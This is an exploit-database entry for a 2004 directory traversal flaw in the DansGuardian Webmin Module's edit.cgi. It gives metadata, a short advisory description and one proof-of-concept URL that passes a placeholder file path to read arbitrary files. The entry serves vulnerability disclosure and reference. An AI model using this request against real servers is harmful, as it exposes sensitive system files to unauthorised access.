DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal

Author: FIST
type: webapps
platform: cgi
port: 
date_added: 2004-01-10 
date_updated: 2012-12-20 
verified: 1 
codes: OSVDB-3445 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/9394/info

A problem has been identified in the handling of input by scripts packaged with the DansGuardian Webmin Module. Because of this, it is possible for a remote to gain access to potentially sensitive information.

https://www.example.com:10000/dansguardian/edit.cgi?file=[FILE]